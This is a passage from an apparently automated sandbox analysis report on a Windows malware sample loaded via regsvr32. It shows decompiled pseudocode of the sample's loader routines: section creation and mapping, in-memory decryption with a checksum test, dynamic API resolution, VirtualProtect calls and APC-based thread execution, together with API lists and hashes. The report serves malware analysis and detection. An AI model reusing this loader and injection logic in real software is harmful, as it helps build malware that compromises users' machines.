                                          • Instruction ID: aba153511f18050926eae0e99bc6aa379b0c0247eeaba9f9b84b923fb60753f3
                                          • Opcode Fuzzy Hash: 8c6be8f3b980ded6b205a1427aecf0c4be46124430f3a58618e79d9fd503a6bc
                                          • Instruction Fuzzy Hash: 8DF0EC76900119BB8B119FA9CC85CDF7BACEF093947158066BA08D7212E775EA149BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,00C75335,616D692F,00000000), ref: 00C79DFB
                                          • lstrlen.KERNEL32(?), ref: 00C79E03
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00C79E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 00C79E25
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 73b0c1d76641f512dda10548cab9edfe81459c6d96bd915168065c61a8e28ff2
                                          • Instruction ID: 8978f680462b89700fbc6777da0d3fc4109c51a83bb9415e9e755eae67f2c58b
                                          • Opcode Fuzzy Hash: 73b0c1d76641f512dda10548cab9edfe81459c6d96bd915168065c61a8e28ff2
                                          • Instruction Fuzzy Hash: C8E04833805622EB87226BA4AC48D8FBFA9FF89350705891AF65893124C731C915DBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Callgraph

                                          Executed Functions

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 98 401a34-401a96 NtCreateSection 99 401a98-401aa1 call 4010ba 98->99 100 401acd-401ad1 98->100 103 401aa6-401aaa 99->103 104 401ad3-401ad9 100->104 105 401ac5-401acb 103->105 106 401aac-401ac3 memset 103->106 105->104 106->104
                                          C-Code - Quality: 72%
                                          			E00401A34(intOrPtr* __eax, void** _a4) {
                                          				int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				int _v28;
                                          				int _v32;
                                          				intOrPtr _v36;
                                          				int _v40;
                                          				int _v44;
                                          				void* _v48;
                                          				void* __esi;
                                          				long _t34;
                                          				void* _t39;
                                          				void* _t47;
                                          				intOrPtr* _t48;
                                          
                                          				_t48 = __eax;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v24 =  *((intOrPtr*)(__eax + 4));
                                          				_v16 = 0;
                                          				_v12 = 0;
                                          				_v48 = 0x18;
                                          				_v44 = 0;
                                          				_v36 = 0x40;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v28 = 0;
                                          				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                          				if(_t34 < 0) {
                                          					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                          				} else {
                                          					 *_t48 = _v16;
                                          					_t39 = E004010BA(_t48,  &_v12); // executed
                                          					_t47 = _t39;
                                          					if(_t47 != 0) {
                                          						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                          					} else {
                                          						memset(_v12, 0, _v24);
                                          						 *_a4 = _v12;
                                          					}
                                          				}
                                          				return _t47;
                                          			}


















                                          APIs
                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                            • Part of subcall function 004010BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                          • memset.NTDLL ref: 00401AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Section$CreateViewmemset
                                          • String ID: @
                                          • API String ID: 2533685722-2766056989
                                          • Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction ID: 471401f0b8c6b4b7cc2e8332a800b59de25362df95d7a1f7f52e8276a5367227
                                          • Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
                                          • Instruction Fuzzy Hash: 2721F9B1E00209AFCB11DFA9C8849DEFBB9EF48354F10443AE616F3250D735AA458FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4010ba-4010ec NtMapViewOfSection 140 4010f2 139->140 141 4010ee-4010f0 139->141 142 4010f6-4010f9 140->142 141->142
                                          C-Code - Quality: 68%
                                          			E004010BA(void** __esi, PVOID* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				long _t13;
                                          
                                          				_v16 = 0;
                                          				asm("stosd");
                                          				_v8 = 0;
                                          				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                          				if(_t13 < 0) {
                                          					_push(_t13);
                                          					return __esi[6]();
                                          				}
                                          				return 0;
                                          			}







                                          APIs
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction ID: 10958ca1104106c1f1914508b01f5b68205e6ea8213fc9395d66977e5d822f6c
                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                          • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44394B10893AB152E14A0D6319E489A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 85%
                                          			E004011D4(void* __ecx, void* __edx, void* __edi, long _a4) {
                                          				long _v8;
                                          				void* _v32;
                                          				long _t21;
                                          				long _t23;
                                          				long _t25;
                                          				void* _t26;
                                          				long _t29;
                                          				long _t30;
                                          				long _t34;
                                          				void* _t39;
                                          				intOrPtr _t42;
                                          				void* _t47;
                                          				void* _t52;
                                          				signed int _t55;
                                          				void* _t57;
                                          				intOrPtr* _t58;
                                          
                                          				_t47 = __ecx;
                                          				_t21 = E0040179C();
                                          				_v8 = _t21;
                                          				if(_t21 != 0) {
                                          					return _t21;
                                          				}
                                          				do {
                                          					_t55 = SwitchToThread() + 8;
                                          					_t23 = E00401B6F(__edi, _t55); // executed
                                          					_v8 = _t23;
                                          					Sleep(0x20 + _t55 * 4); // executed
                                          					_t25 = _v8;
                                          				} while (_t25 == 0xc);
                                          				if(_t25 != 0) {
                                          					L21:
                                          					return _t25;
                                          				}
                                          				_push(__edi);
                                          				if(_a4 != 0) {
                                          					L11:
                                          					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x404140, 0, 0); // executed
                                          					_t57 = _t26;
                                          					if(_t57 == 0) {
                                          						L18:
                                          						_v8 = GetLastError();
                                          						L19:
                                          						_t25 = _v8;
                                          						if(_t25 == 0xffffffff) {
                                          							_t25 = GetLastError();
                                          						}
                                          						goto L21;
                                          					}
                                          					_t29 = QueueUserAPC(E004016E4, _t57,  &_v32); // executed
                                          					if(_t29 == 0) {
                                          						_t34 = GetLastError();
                                          						_a4 = _t34;
                                          						TerminateThread(_t57, _t34);
                                          						CloseHandle(_t57);
                                          						_t57 = 0;
                                          						SetLastError(_a4);
                                          					}
                                          					if(_t57 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                          						_v8 = _t30;
                                          						if(_t30 == 0) {
                                          							GetExitCodeThread(_t57,  &_v8);
                                          						}
                                          						CloseHandle(_t57);
                                          						goto L19;
                                          					}
                                          				}
                                          				if(E0040130B(_t47,  &_a4) != 0) {
                                          					 *0x404138 = 0;
                                          					goto L11;
                                          				}
                                          				_t58 = __imp__GetLongPathNameW;
                                          				_t39 =  *_t58(_a4, 0, 0); // executed
                                          				_t52 = _t39;
                                          				if(_t52 == 0) {
                                          					L9:
                                          					 *0x404138 = _a4;
                                          					goto L11;
                                          				}
                                          				_t10 = _t52 + 2; // 0x2
                                          				_t42 = E00401026(_t52 + _t10);
                                          				 *0x404138 = _t42;
                                          				if(_t42 == 0) {
                                          					goto L9;
                                          				}
                                          				 *_t58(_a4, _t42, _t52); // executed
                                          				E00401938(_a4);
                                          				goto L11;
                                          			}



















                                          APIs
                                            • Part of subcall function 0040179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                            • Part of subcall function 0040179C: GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                            • Part of subcall function 0040179C: GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                            • Part of subcall function 0040179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                          • SwitchToThread.KERNEL32 ref: 004011EE
                                            • Part of subcall function 00401B6F: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                            • Part of subcall function 00401B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                            • Part of subcall function 00401B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                          • Sleep.KERNEL32(00000000,-00000008), ref: 0040120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0040125E
                                          • CreateThread.KERNEL32 ref: 0040128A
                                          • QueueUserAPC.KERNEL32(004016E4,00000000,?), ref: 004012A6
                                          • GetLastError.KERNEL32 ref: 004012B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 004012BD
                                          • CloseHandle.KERNEL32(00000000), ref: 004012C4
                                          • SetLastError.KERNEL32(?), ref: 004012CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004012D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 004012EA
                                          • CloseHandle.KERNEL32(00000000), ref: 004012F1
                                          • GetLastError.KERNEL32 ref: 004012F5
                                          • GetLastError.KERNEL32 ref: 00401303
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                          • Instruction ID: c3a5eca2a66aa5e7bbaa8b49f19a45a5b77f58551790e7c1cf36b2dcd64879de
                                          • Opcode Fuzzy Hash: fd35b077739daf7847114f9f346be5ede622197cae8833bd08c1554a8ffecee1
                                          • Instruction Fuzzy Hash: 16315071801118BFDB11AFB5DD889AF7EACEB08395710417AF905F72B4D7388E419BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 69%
                                          			E004010FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                          				intOrPtr _v12;
                                          				struct _FILETIME* _v16;
                                          				short _v60;
                                          				struct _FILETIME* _t14;
                                          				intOrPtr _t15;
                                          				long _t18;
                                          				void* _t19;
                                          				void* _t22;
                                          				intOrPtr _t31;
                                          				long _t32;
                                          				void* _t34;
                                          
                                          				_t31 = __edx;
                                          				_t14 =  &_v16;
                                          				GetSystemTimeAsFileTime(_t14);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v12);
                                          				_push(_v16);
                                          				L00402180();
                                          				_push(_t14);
                                          				_v16 = _t14;
                                          				_t15 =  *0x404144;
                                          				_push(_t15 + 0x40505e);
                                          				_push(_t15 + 0x405054);
                                          				_push(0x16);
                                          				_push( &_v60);
                                          				_v12 = _t31;
                                          				L0040217A();
                                          				_t18 = _a4;
                                          				if(_t18 == 0) {
                                          					_t18 = 0x1000;
                                          				}
                                          				_t19 = CreateFileMappingW(0xffffffff, 0x404148, 4, 0, _t18,  &_v60); // executed
                                          				_t34 = _t19;
                                          				if(_t34 == 0) {
                                          					_t32 = GetLastError();
                                          				} else {
                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                          						if(_t22 == 0) {
                                          							_t32 = GetLastError();
                                          							if(_t32 != 0) {
                                          								goto L9;
                                          							}
                                          						} else {
                                          							 *_a8 = _t34;
                                          							 *_a12 = _t22;
                                          							_t32 = 0;
                                          						}
                                          					} else {
                                          						_t32 = 2;
                                          						L9:
                                          						CloseHandle(_t34);
                                          					}
                                          				}
                                          				return _t32;
                                          			}















                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040111F
                                          • _snwprintf.NTDLL ref: 00401144
                                          • CreateFileMappingW.KERNELBASE(000000FF,00404148,00000004,00000000,?,?), ref: 00401169
                                          • GetLastError.KERNEL32 ref: 00401180
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401194
                                          • GetLastError.KERNEL32 ref: 004011AC
                                          • CloseHandle.KERNEL32(00000000), ref: 004011B5
                                          • GetLastError.KERNEL32 ref: 004011BD
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                          • Instruction ID: ef5076f750e2cd4e4e98990b3d3664116a4674d5ffa79623b8c505300cb00d24
                                          • Opcode Fuzzy Hash: 10781628c56b613e53fd0cec9fa96b362338ff09033fe3b660c77061631cefb2
                                          • Instruction Fuzzy Hash: 2C2198B2600108BFD714AF94DC84E9E3BADEB88355F104136FB15FB2E0D6745D458B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 45 401954-401968 46 40196a-40196b 45->46 47 4019dd-4019ea InterlockedDecrement 45->47 48 401971-40197e InterlockedIncrement 46->48 49 401a2a-401a31 46->49 47->49 50 4019ec-4019f2 47->50 48->49 51 401984-401998 HeapCreate 48->51 52 4019f4 50->52 53 401a1e-401a24 HeapDestroy 50->53 55 4019d8-4019db 51->55 56 40199a-4019cf call 40105a CreateThread 51->56 54 4019f9-401a09 SleepEx 52->54 53->49 57 401a12-401a18 CloseHandle 54->57 58 401a0b-401a10 54->58 55->49 56->49 61 4019d1-4019d4 56->61 57->53 58->54 58->57 61->55
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				long _t9;
                                          				void* _t10;
                                          				void* _t18;
                                          				void* _t23;
                                          				void* _t36;
                                          
                                          				_push(__ecx);
                                          				_t9 = _a8;
                                          				_v8 = 1;
                                          				if(_t9 == 0) {
                                          					_t10 = InterlockedDecrement(0x404108);
                                          					__eflags = _t10;
                                          					if(_t10 == 0) {
                                          						__eflags =  *0x40410c;
                                          						if( *0x40410c != 0) {
                                          							_t36 = 0x2710;
                                          							while(1) {
                                          								SleepEx(0x64, 1);
                                          								__eflags =  *0x404118;
                                          								if( *0x404118 == 0) {
                                          									break;
                                          								}
                                          								_t36 = _t36 - 0x64;
                                          								__eflags = _t36;
                                          								if(_t36 > 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							CloseHandle( *0x40410c);
                                          						}
                                          						HeapDestroy( *0x404110);
                                          					}
                                          				} else {
                                          					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                          						 *0x404110 = _t18;
                                          						_t41 = _t18;
                                          						if(_t18 == 0) {
                                          							L6:
                                          							_v8 = 0;
                                          						} else {
                                          							 *0x404130 = _a4;
                                          							asm("lock xadd [eax], ebx");
                                          							_t23 = CreateThread(0, 0, E0040103B, E0040105A(_a12, 0, 0x404118, _t41), 0,  &_a8); // executed
                                          							 *0x40410c = _t23;
                                          							if(_t23 == 0) {
                                          								asm("lock xadd [esi], eax");
                                          								goto L6;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                          • InterlockedIncrement.KERNEL32(00404108), ref: 00401976
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 0040198B
                                          • CreateThread.KERNEL32 ref: 004019C2
                                          • InterlockedDecrement.KERNEL32(00404108), ref: 004019E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 004019FC
                                          • CloseHandle.KERNEL32 ref: 00401A18
                                          • HeapDestroy.KERNEL32 ref: 00401A24
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                          • Instruction ID: a0ab11432e77b84ae515e188bafeff82c6af5491473b460d6bc066eb84a28543
                                          • Opcode Fuzzy Hash: 44ccef76f4ce31eeeca5324c3b88906bc10cd886d3300b2955b61f5ac9214176
                                          • Instruction Fuzzy Hash: 6D2180B1701205AFC7109F69AD88A6A7BA8F7E5751714413AF601F72A0E6788D408F58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E00401F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				_Unknown_base(*)()* _t28;
                                          				_Unknown_base(*)()* _t32;
                                          				_Unknown_base(*)()* _t35;
                                          				_Unknown_base(*)()* _t38;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E00401026(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t48 = GetModuleHandleA( *0x404144 + 0x405014);
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48,  *0x404144 + 0x40514c);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E00401938(_t54);
                                          					} else {
                                          						_t32 = GetProcAddress(_t48,  *0x404144 + 0x40515c);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t35 = GetProcAddress(_t48,  *0x404144 + 0x40516f);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t38 = GetProcAddress(_t48,  *0x404144 + 0x405184);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t41 = GetProcAddress(_t48,  *0x404144 + 0x40519a);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E00401A34(_t54, _a8); // executed
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                            • Part of subcall function 00401026: HeapAlloc.KERNEL32(00000000,?,00401329,00000208,?,-00000008,?,?,?,0040122F,?), ref: 00401032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                            • Part of subcall function 00401A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401A91
                                            • Part of subcall function 00401A34: memset.NTDLL ref: 00401AB3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                          • Instruction ID: 7231f389cd8be8db14db85a4f8175327975b3e6d23b460530a12d7a5a8207ee9
                                          • Opcode Fuzzy Hash: bdecdfe8be8964bc3f68c73273cd601846a070c5aeaf0cc420d3301f83d310a9
                                          • Instruction Fuzzy Hash: 432119B060070AAFD721DF69DE48E6BB7ECEB543447004076E605EB2A1E6B4E905CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 79 401b6f-401b90 call 401c8a 82 401c82-401c87 79->82 83 401b96-401bd0 VirtualAlloc 79->83 84 401bd6-401bdc 83->84 85 401c7a 83->85 87 401c42 84->87 88 401bde-401bf4 84->88 86 401c81 85->86 86->82 89 401c47-401c4c 87->89 90 401bf9-401c3d call 401908 88->90 91 401c61 89->91 92 401c4e-401c5f memcpy 89->92 96 401bf6 90->96 97 401c3f-401c40 90->97 94 401c68-401c78 VirtualFree 91->94 92->94 94->86 96->90 97->89
                                          C-Code - Quality: 83%
                                          			E00401B6F(void* __edi, intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				unsigned int _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr* _v36;
                                          				void* _v40;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				intOrPtr _t42;
                                          				void* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed int _t61;
                                          				intOrPtr _t78;
                                          				void* _t79;
                                          
                                          				_t78 =  *0x404130;
                                          				_t42 = E00401C8A(_t78,  &_v24,  &_v16);
                                          				_v20 = _t42;
                                          				if(_t42 == 0) {
                                          					asm("sbb ebx, ebx");
                                          					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                          					_t79 = _t78 + _v24;
                                          					_v40 = _t79;
                                          					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                          					_v28 = _t49;
                                          					if(_t49 == 0) {
                                          						_v20 = 8;
                                          					} else {
                                          						_v8 = _v8 & 0x00000000;
                                          						if(_t61 <= 0) {
                                          							_t50 =  *0x404140;
                                          						} else {
                                          							_t53 = _t49 - _t79;
                                          							_v32 = _t53;
                                          							_v36 = _t53 + _a4 + 0x4051a2;
                                          							_v12 = _t79;
                                          							while(1) {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("rol edx, cl");
                                          								E00401908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                          								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                          								_v8 = _v8 + 1;
                                          								_v12 = _v12 + 0x1000;
                                          								 *0x404140 = _t50;
                                          								if(_v8 >= _t61) {
                                          									break;
                                          								}
                                          								_t53 = _v32;
                                          							}
                                          						}
                                          						if(_t50 != 0x59935a40) {
                                          							_v20 = 0xc;
                                          						} else {
                                          							memcpy(_v40, _v28, _v16);
                                          						}
                                          						VirtualFree(_v28, 0, 0x8000); // executed
                                          					}
                                          				}
                                          				return _v20;
                                          			}






















                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,004011FF,-00000008), ref: 00401C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 108 401eb4-401eea VirtualProtect 109 401f57-401f5e 108->109 110 401eec 108->110 111 401eef-401ef3 110->111 111->109 112 401ef5-401ef9 111->112 113 401f11-401f15 112->113 114 401efb-401f0f 112->114 116 401f27-401f29 113->116 117 401f17-401f25 113->117 115 401f2a-401f3e VirtualProtect 114->115 118 401f40-401f46 GetLastError 115->118 119 401f49-401f55 115->119 116->115 117->115 118->119 119->109 119->111
                                          C-Code - Quality: 82%
                                          			E00401EB4(void* __eax, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				long _v16;
                                          				signed int _v20;
                                          				signed int _t31;
                                          				long _t33;
                                          				int _t34;
                                          				signed int _t35;
                                          				signed int _t42;
                                          				void* _t50;
                                          				void* _t51;
                                          				signed int _t54;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t42 =  *(__eax + 6) & 0x0000ffff;
                                          				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                          				_v20 = _t42;
                                          				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                                          				_v8 = _v8 & 0x00000000;
                                          				if(_t42 <= 0) {
                                          					L11:
                                          					return _v12;
                                          				}
                                          				_t51 = _t50 + 0x24;
                                          				while(1) {
                                          					_t54 = _v12;
                                          					if(_t54 != 0) {
                                          						goto L11;
                                          					}
                                          					asm("bt dword [esi], 0x1d");
                                          					if(_t54 >= 0) {
                                          						asm("bt dword [esi], 0x1e");
                                          						if(__eflags >= 0) {
                                          							_t33 = 4;
                                          						} else {
                                          							asm("bt dword [esi], 0x1f");
